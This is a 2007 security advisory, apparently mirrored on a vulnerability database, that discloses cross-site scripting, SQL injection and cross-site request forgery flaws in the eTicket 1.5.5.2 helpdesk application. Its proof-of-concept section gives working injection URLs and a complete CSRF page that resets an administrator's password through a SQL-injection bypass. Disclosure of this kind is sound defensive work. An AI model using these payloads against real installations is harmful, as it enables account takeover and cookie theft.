Vulners
Lucene search
eticket-multi.txt
`======================================================================
eTicket 1.5.5.2 Multiple Vulnerabilities
======================================================================
Author: L4teral <l4teral [4t] gmail com>
Impact: Cross Site Scripting
Cross Site Request Forgery
SQL Injection
Status: patch not available
------------------------------
Affected software description:
------------------------------
Application: eTicket
Version: 1.5.5.2 (other versions may also be affected)
Vendor: http://eticket.sourceforge.net
Description:
eTicket is a PHP-based electronic (open source) support ticket system
based on osTicket, that can receive tickets via email (pop3/pipe) or
a web form. It also offers a ticket manager with many features.
An ideal helpdesk solution for any website.
--------------
Vulnerability:
--------------
1. The variable 's' is not properly sanitized leading to
cross site scripting.
2. The script admin.php is prone to sql injections (admin
privileges required).
3. The search of the application is prone to sql injection, which
can be used to obtain login credentials or perform other
malicious taks.
The parameters 'status', 'sort' and 'way' are not properly
sanitized before being used in a sql query.
Exploitation requires valid user credentials, but as any user
is able to create a ticket, an attacker can obtain valid login
data without any problems.
4. The application is vulnerable to cross site request forgery.
Combined with the "my account" part of the application
being prone to sql injection, the password of an admin
account can be set to an arbitrary value by just visiting
a specially crafted website wile being logged in to the
application. Normally, the current password has to be entered
to change the password of an account. This can be circumvented
in the described way by combining the two vulnerabilities.
------------
PoC/Exploit:
------------
1.
http://localhost/eTicket/view.php?s="><script>alert(document.cookie)</script>
2.
http://localhost/eTicket/admin.php?a=headers&msg=SQL'
3.
http://localhost/eTicket/search.php?s=advanced&text=test&cat=&status=open'SQL&search_submit=Search
4.
By visiting a page containing the following code, the password of a
logged in administrator will be set to "hacked".
<html>
<body>
<form id="csrf" name="csrf"
action="http://localhost/eTicket/admin.php?a=my" method="post">
<input type="hidden" name="a" value="my">
<input type="text" name="username" value="admin"><br>
<input type="text" name="name" value="admin"><br>
<input type="text" name="email" value="[email protected]"><br>
<input type="password" name="password" value="') OR ('1'='1"><br>
<input type="password" name="npassword" value="hacked"><br>
<input type="password" name="vpassword" value="hacked"><br>
<textarea name="sig" cols="30" rows="5"></textarea><br>
<input type="submit" name="submit" value="Save Changes"><br>
</form>
<script language="JavaScript">document.getElementById('csrf').submit.click()</script>
</body>
</html>
---------
Timeline:
---------
2007-11-19 - vendor informed
The vendor responded, but after multiple attempts i did not get
a statement whether these vulnerabilities will get fixed
in a new version.
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
07 Jan 2008 00:00Current
7.4High risk
Vulners AI Score7.4